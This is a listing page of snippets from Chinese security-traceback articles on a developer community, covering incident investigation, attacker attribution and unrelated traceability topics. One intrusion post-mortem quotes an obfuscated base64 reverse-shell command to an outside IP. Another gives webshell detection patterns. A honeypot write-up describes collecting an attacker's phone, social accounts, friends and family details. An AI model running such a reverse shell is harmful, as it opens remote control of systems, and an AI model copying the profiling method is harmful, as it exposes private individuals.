- 综合排序
- 最热优先
- 最新优先
- 来自专栏网络安全溯源
网络安全溯源指南
下载地址:https://github.com/wsfengfan/SecurityTraceability/ 目录 一、 window系统溯源 1、 检查系统账号安全 1.1查看服务器是否存在可疑账号 2.2查看进程 3、 检查启动项、计划任务、服务 3.1检查启动项 3.2查看计划任务 3.3排查服务自启动 4、 检查系统相关信息 4.1查看系统补丁信息 2.1进程查看 2.2线程查看 2.3进程查杀 2.4调试分析 2.5查看服务 3、 网络排查 3.1分析可疑端口、可疑IP、可疑PID及程序进程 4、 文件排查 4.1find命令的使用 4.2敏感目录 4.3基于时间点查找 三、日志分析 1、window日志分析 1.1安全日志分析 2、Linux 1、IP溯源 2、ID溯源 3、手机号溯源 4、EMail溯源 5、域名溯源 6、木马分析(云沙箱)Linux系统溯源排查1、系统排查1.1 系统信息$ lscpu #
1K30编辑于 2023-11-20 - 来自专栏Bypass
安全攻击溯源思路及案例
---- ---- 1、攻击源捕获 安全设备报警,如扫描IP、威胁阻断、病毒木马、入侵事件等 日志与流量分析,异常的通讯流量、攻击源与攻击目标等 服务器资源异常,异常的文件、账号、进程、端口,启动项、 --域名隐私保护 溯源案例:通过攻击IP历史解析记录/域名,对域名注册信息进行溯源分析 恶意样本 提取样本特征、用户名、ID、邮箱、C2服务器等信息--同源分析 溯源案例:样本分析过程中 水坑攻击、近源渗透、社会工程等 攻击者身份画像 虚拟身份:ID、昵称、网名 真实身份:姓名、物理位置 联系方式:手机号、qq/微信、邮箱 组织情况:单位名称、职位信息 4、 案例二:Web入侵溯源 攻防场景:攻击者通过NDAY和0DAY漏洞渗入服务器网段,Webshell 触发安全预警或者威胁检测阻断了C&C域名的通讯。 溯源方式:隔离webshell样本,使用Web日志还原攻击路径,找到安全漏洞位置进行漏洞修复,从日志可以找到攻击者的IP地址,但攻击者一般都会使用代理服务器或匿名网络(例如Tor)来掩盖其真实的IP地址
3.3K32发布于 2020-10-26 - 来自专栏FreeBuf
记一次“受到攻击后不开心从而进行溯源”的安全溯源事件
但是想想,处理过那么多告警,几乎都是这样放过对面,这次我不想放过了,即使只是一个来自于互联网的盲打攻击,我也想看看到底是什么人干的,于是就有了这篇溯源文章… … 安全分析 1. 2021年7月某日下午, 4.通过互联网上对该IP的被动查询,发现这个IP果然是个cobaltstrike的server: ? 攻击反制 1、这里就得对黑客做个吐槽了,我作为一个非攻击队的底层安全人员,都知道给cobaltstrike注册一个域名,并通过修改证书增加cdn服务器对系统进行隐匿。 4、在威胁情报库对该IP进行查询分析发现这个IP非常恶意 ? 5、在情报留言处发现有情报将其标记为另一IP,对其进行信息查询发现于该ip相关的IP为apt组织相关IP ? 总结 溯源和反制大部分时候护网蓝队干的比较多,不知道有没有人是专门进行黑客追踪的,如果有这方面的大佬可以带带老弟。
87040发布于 2021-07-27 - 来自专栏农夫安全
某服务器安全溯源审计报告
流量关联分析 通过查看服务器连接的程序发现有外网ip 23.33.178.8和91.121.2.76两个,查看到clock-applet一般为程序自带的文件,而91.121.2.76 IP显示的程序为
1.3K60发布于 2018-03-30 - 来自专栏绿盟科技研究通讯
安全知识图谱 | 按图索“迹” 追踪溯源
安全知识图谱的构建是集成了与安全相关的异构知识库如CVE[4],CCE[5],CVSS[6],CAPEC[7],CYBOX[8],KillChain和STUCCO等。 基于图中路径的攻击信息并不能完全反应攻击路径,需要结合威胁评估方法,把溯源图中的节点看作目标实体,边看作攻击行为,通过攻击威胁评估模型得到溯源图中每个节点的威胁度,基于节点的威胁度通过贪心算法找到攻击路径 方法如图4所示。已知IP1为攻击者,其相邻节点只有IP2,那么攻击路径为IP1→IP2。IP2的邻节点有5个,其中威胁度最大的是P1节点,则攻击路径变成IP1→IP2→IP1。 图4 溯源图中的节点威胁度评估 真实的企业安全运营中,攻击行为是有一定的时序性,因此在调查攻击路径时需要考虑攻击行为的时序特征。通过对节点和边的威胁评估结果为节点与边赋予一个表述威胁度的权重。 在攻击路径调查过程中,通常始于已确定的攻击行为或已攻陷的受害者攻击路径,而溯源的终止条件通常为外部IP的网络连接行为,如果无法溯源到网络连接行为则该主机即为最终攻击者。 这里路径溯源算法采用贪心算法。
1.3K40编辑于 2021-12-10 - 来自专栏JAVA技术zhai
【网络安全】浅谈IP溯源的原理及方法
溯源思路 1、攻击源捕获 安全设备报警,如扫描IP、威胁阻断、病毒木马、入侵事件等 日志与流量分析,异常的通讯流量、攻击源与攻击目标等 服务器资源异常,异常的文件、账号、进程、端口,启动项、计划任务和服务等 Web渗透、水坑攻击、近源渗透、社会工程等 3.2 攻击者身份画像 虚拟身份:ID、昵称、网名 真实身份:姓名、物理位置 联系方式:手机号、qq/微信、邮箱 组织情况:单位名称、职位信息 4、 安全攻击溯源篇 4.1 案例一:邮件钓鱼攻击溯源 攻防场景:攻击者利用社会工程学技巧伪造正常邮件内容,绕过邮件网关的查杀,成功投递到目标邮箱,诱骗用户点击邮件链接或下载附件文件。 4.2 案例二:Web入侵溯源 攻防场景:攻击者通过NDAY和0DAY漏洞渗入服务器网段,Webshell 触发安全预警或者威胁检测阻断了C&C域名的通讯。 溯源方式:隔离webshell样本,使用Web日志还原攻击路径,找到安全漏洞位置进行漏洞修复,从日志可以找到攻击者的IP地址,但攻击者一般都会使用代理服务器或匿名网络(例如Tor)来掩盖其真实的IP地址
3.8K21编辑于 2022-05-10 - 来自专栏Netkiller
食品安全溯源区块链解决方案探索
食品安全溯源案例 33.2.1. 背景 需求是通过区块链跟踪产品,实现产品产地,生产,流通等环节溯源。 安全问题 我将安全划分为六层,分别是: +----------+-----------------------------+ | 实体层 | 物 ,安全分为很多层,区块链只能做到存储层的安全。 区块链无法解决用户层,应用层,逻辑层等安全问题,他只能保证存储在硬盘上的区块不被修改。 颗粒度问题 朔源的颗粒度问题,例如“红酒”的溯源,我们是将单位溯源做到箱呢?还是打,或是瓶呢?
4.5K100发布于 2018-03-27 - 来自专栏数通
网络安全溯源方法,请网工务必掌握!
在当今这个数字化飞速发展的时代,网络攻击已经成为一种常见且严重的安全威胁。无论是个人用户还是大型企业,都可能成为网络攻击的目标。面对日益猖獗的网络攻击,攻击溯源成为了网络安全领域的一项重要工作。 那么,什么是攻击溯源?在网络安全中,攻击溯源有哪些方法呢?阿祥将为您详细解析。 什么是攻击溯源? 攻击溯源是指通过分析攻击事件的特点、行为、产生的日志等信息,追溯攻击者的来源和目的。 4. 分析攻击工具 攻击者通常会使用各种工具和恶意代码进行攻击。通过分析这些工具和代码,可以确定攻击者的攻击技术和水平。了解攻击工具的特性,不仅有助于锁定攻击者的身份,还能提高我们的防御能力。 执法机构合作:与警方和国家安全机构合作,追踪和起诉网络犯罪分子。 结语 网络安全攻击溯源是一项复杂且多维的任务,需要综合运用多种技术和方法。 通过有效的攻击溯源,不仅可以迅速响应和缓解当前的安全威胁,还可以为未来的防御策略提供宝贵的见解和指导。希望本文能为您在网络安全领域的探索提供一些帮助。
1K10编辑于 2024-12-03 - 来自专栏Netkiller
食品安全溯源区块链解决方案探索
食品溯源案例 33.2.1. 背景 需求是通过区块链跟踪产品,实现产品产地,生产,流通等环节溯源。 安全问题 我将安全划分为六层,分别是: +----------+-----------------------------+ | 实体层 | 物 ,安全分为很多层,区块链只能做到存储层的安全。 颗粒度问题 朔源的颗粒度问题,例如“红酒”的溯源,我们是将单位溯源做到箱呢?还是打,或是瓶呢? Hyperledger fabric) Hyperledger Fabric 积分代币上链方案 Hyperledger fabric Chaincode 开发详解 Hyperledger也能实现Token代币 食品安全溯源区块链解决方案探索
9K1501发布于 2018-03-14 - 来自专栏数据派THU
讲座预告 | 中美网络安全标准追根溯源
52e38868786a331a36402555e688199b.png|https://ask.qcloudimg.com/http-save/yehe-1269631/0b09905f290e947a189051a835f1a5d4. png^0|0|1|0|0|0|1|1|0|0|1|2^^$0|@$1|2|3|4|5|6|7|O|8|@]|9|@$A|P|B|Q|1|R]]|C|@]]|$1|D|3|4|5|6|7|S|8|@]| 9|@$A|T|B|U|1|V]]|C|@]]|$1|E|3|4|5|6|7|W|8|@]|9|@$A|X|B|Y|1|Z]]|C|@]]]|F|@$5|G|H|I|C|$J|K|L|-4]]|$5|G |H|I|C|$J|M|L|-4]]|$5|G|H|I|C|$J|N|L|-4]]]]
33100编辑于 2022-09-14 - 来自专栏安恒网络空间安全讲武堂
溯源小记
溯源的思路 看对方的目的是什么,就是最终目标是做什么。然后根据自己经验 看看达到这个目标 需要进行什么操作 逆推回去。看看这些过程都会留下什么日志。 --- 2 yang yang 4096 6月 28 07:54 .gconf -rw------- 1 yang yang 49 6月 28 07:54 .Xauthority 4. 根据ip筛选 sudo cat access.log| grep 'ip' 4. u 0 用户名 端口 来自 最后登陆时间 root **从未登录过** 4. /etc/init.d/rc.local /etc/rc.local 3. chkconfig 4.
86920发布于 2018-09-21 - 来自专栏学习之旅
【安全】记录钓鱼邮件中木马病毒的分析溯源
Generic.ShellCode.RDI.Marte.4.D99E8D57:这是一个通用的壳代码检测名称,可能与某些恶意软件的执行代码有关,用于执行特定的恶意操作。 4、使用云沙箱工具详细分析一下它的行为。 个人比较喜欢用这个工具,免费无广告且非常详细:https://s.threatbook.com/可以看到这个钓鱼软件执行的一系列操作。 **安全机制**:包含安全cookie的初始化和检查,用于防止缓冲区溢出等安全问题。 3. **异常处理**:实现了异常处理机制,包括异常过滤、安全失败报告等。 4. - `___report_gsfailure`:处理安全失败,终止进程。 - **异常处理**: - `__except_handler4`:异常处理函数,用于处理dll中的异常。 **安全机制的实现**:通过安全cookie和异常处理机制,增强了dll的安全性,防止常见的安全漏洞。 2.
80710编辑于 2025-04-09 - 来自专栏安全小圈
蜜罐溯源
到了今天,蜜罐技术已经成为网络安全中的一种入侵诱饵,目的是引诱黑客前来攻击,并收集黑客相关的证据和信息。 ? 随着经济的发展,国家对安全行业的高度重视。 猜测163邮箱也是该号码‘、QQ号码 支付宝溯源——转账——查找黑客信息 REG007网站: https://www.reg007.com/ 查询邮箱注册过的网站 微博找回密码链接: https:// 0x03溯源结果 结果 ? IP位于湖南长沙 163邮箱、QQ号码、微信号码 手机号 相关好友,母亲信息 他的好友:张*,刘* 人物头像 附件 ? ? ? ? ? ? ? 结束!!! 弥 天 安全实验室
1.8K30发布于 2020-08-21 - 来自专栏腾讯云安全专家服务
入侵溯源难点和云溯源体系建设
image.png 在安全行业,攻击溯源领域一直是一个强烈依赖人力和经验型的领域。 image.png ---- 3.高效安全溯源技术解决方案,溯源工具是空白。 (3) 体系化安全溯源知识,工具建设:几乎空白 可能会有同学质疑,很多安全产品也提供此类功能呀? ——亲测过许多安全检测分析产品和工具,取证逻辑上强关联真的不准确! image.png ---- 4.入侵溯源监控体系如何建设呢? 以OSI七层模型为例,还原我们溯源的时候,如何进行路径复现: image.png 安全溯源中常涉及的取证分析元素: 1.时间线分析:(1)最早探测时间(2)入侵时间(3)权限维持时间(4)登录时间 2.
4.4K201发布于 2021-03-16 - 来自专栏腾讯云安全专家服务
从一次攻击溯源中暴露的安全问题
/sh -c bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjMuMTA4LjExMS4xOC84MCAwPiYx}|{base64,-d}|{bash,-i} 4.如何解决和修复这些问题?如何从根本上避免此类问题的出现? ---- 开始溯源! 4.应用层日志溯源 服务器上部署了tomcat服务和nginx服务,那么我们可以针对nginx和tomcat的访问日志access.log和报错日志error.log开展分析溯源。 4.攻击者未攻入主机层,只是使用了远程类命令执行漏洞触发bash反弹shell,并且是以root权限 5.应用层nginx无日志记录,无法判定具体入侵漏洞种类,但结合主机安全扫描结果,大概率是由Jackson 类RCE漏洞触发bash反弹shell远程命令执行 ---- 暴露问题 1.安全漏洞未及时修复,使用组件未及时更新 2.应用层日志nginx访问日志未配置,不具备应用层日志溯源能力 3.登录密钥配置不合理
1.6K112发布于 2021-03-03 - 来自专栏数据派THU
干货 | 陆宝华:中美网络安全标准追根溯源
中央指令由公安部开展计算机安全工作,这就是中国计算机安全工作的起始。 二、等级保护的提出与信息系统的定义 1994年,国务院出台网络安全第一个法规:《中华人民共和国计算机信息系统安全保护条例》。 2、对计算机信息系统安全进行了定义 第三条:计算机信息系统的安全保护,应当保障计算机及其相关的和配套的设备、设施(含网络)的安全,运行环境的安全,保障信息的安全,保障计算机功能的正常发挥,以维护计算机信息系统的安全运行 4、范围、主管单位、规定了任何组织个人,不得危害计算机信息系统的安全 第九条:计算机信息系统实行安全等级保护。安全等级的划分标准和安全等级保护的具体办法,由公安部会同有关部门制定。 TCB的构成衍生出六个基本要求: 1、安全策略要求:访问控制要求、标记要求; 2、安全责任要求:标识与鉴别要求、审计要求; 3、安全保障要求:运行保障要求、生命周期保障要求(持续性保证) 4、文档要求 (1)安全功能用户指南 (2)可信设施手册 (3)测试文档 (4)设计资料 1、自主保护类 客体重用指当一个用户已经从系统当中退出,要释放原来占用的资源,主要包括外存储器、内部存储器,以及各种栈当中的资源释放
72830编辑于 2022-09-23 【专利技术】筑牢数字安全防线:高维数据的反爬虫与溯源创新(第4期)
针对这一痛点,合肥高维数据技术有限公司凭借其在网络安全与数据隐藏领域的深厚积累,推出了具有自主知识产权的 “基于字体文件重编排的反爬虫溯源方法及系统”,将“反爬虫”和“溯源”两个目标巧妙地结合在一个基于字体处理的技术方案中 技术核心:双重防护+精准溯源该反爬虫溯源技术方案是一项集动态混淆与隐形水印于一体的颠覆性解决方案,超越了传统反爬虫技术的被动防御,构筑了一道“前端有效防护,后端精准追溯”的安全闭环:1.动态字体编码,让数据 精准溯源:水印包含用户唯一编号与校验码,实现盗版行为的账号级精准定位,震慑内部泄露与非法爬取。 招聘网站:对企业发布的联系方式、职位详情及个人用户的简历数据等进行有效保护,防止信息被爬取滥用,维护用户隐私与企业资源安全。 它不仅有效提升了爬虫的数据获取成本,更通过内置的溯源能力,为内容安全加装了一道“隐形追踪器”,让盗版行为无处遁形。保护数字资产,从源头开始!欢迎关注:获取更多【专利解读】与技术干货!
24010编辑于 2025-12-05- 来自专栏基础项目部署
centos入侵溯源
\.#(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?) \.(25[0-5]|2[0-4] [0-9]|[01]?[0-9][0-9]?)" www/html/*/*egrep 'eval|\$_POST|\$_REQUEST|\$_GET|assert' /var/www/html/*检测redis配置文件/etc/redis.conf 的安全策略 redis.conf |grep bindcat /etc/redis.conf |grep requirepasscat /etc/redis.conf |grep protected-mode五、网络设备网络安全设备如防火墙 、行为监测,安全平台如EDR平台、势态感知平台,或者旁路流量记录中查找失陷主机的南北和东西流量日志信息,找到攻击来源
59520编辑于 2024-08-19 - 来自专栏只喝牛奶的杀手
事件溯源模式
事件溯源模式具有以下优点: 事件不可变,并且可使用只追加操作进行存储。 用户界面、工作流或启动事件的进程可继续,处理事件的任务可在后台运行。 事件溯源不需要直接更新数据存储中的对象,因而有助于防止并发更新造成冲突。 但是,域模型必须仍然设计为避免可能导致不一致状态的请求。 但是,事件溯源事件的级别通常非常低,可能需要生成特定的集成事件。 通过执行响应事件的数据管理任务和具体化存储事件的视图,事件溯源通常与 CQRS 模式结合。 即使事件溯源会最大程度降低数据更新冲突的可能性,应用程序仍必须能够处理由最终一致性和缺少事务引起的不一致性。 尽管这不是事件溯源的主要特点,但却是通常的实施决策。 何时使用此模式 请在以下方案中使用此模式: 要捕获数据中的意图、用途或原因。
2K40发布于 2019-09-02 基于日志的邮件安全事件检测:从异常行为到攻击溯源
在邮件系统的安全防护中,日志分析是最基础、最重要的手段之一。通过对邮件服务器日志的深入分析,管理员可以识别并防范各种恶意行为,如自动化攻击、大量邮件投递、非法登录等安全事件。 本文将探讨如何利用邮件系统日志来检测恶意邮件行为,识别邮件系统中的异常行为,并结合入侵检测与防御系统(IDS/IPS)进行联合分析,实现对邮件安全事件的全方位监控与溯源。 具体来说,日志可以帮助我们:发现恶意邮件行为,如垃圾邮件、大规模邮件投递等;识别攻击者的异常操作,诸如暴力破解、恶意登录、非法发信等;辅助溯源,追踪攻击者的IP、设备信息,甚至邮件内容。 邮件系统的安全防护需要结合多种策略与工具,通过综合分析和自动化防御机制,确保企业邮件系统不被恶意攻击者利用,保障通信的安全与顺畅。 在实际操作中,管理员需要定期审查邮件系统日志、优化IDS/IPS配置,并及时响应安全事件,形成完善的安全防护体系。
24410编辑于 2025-11-20
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号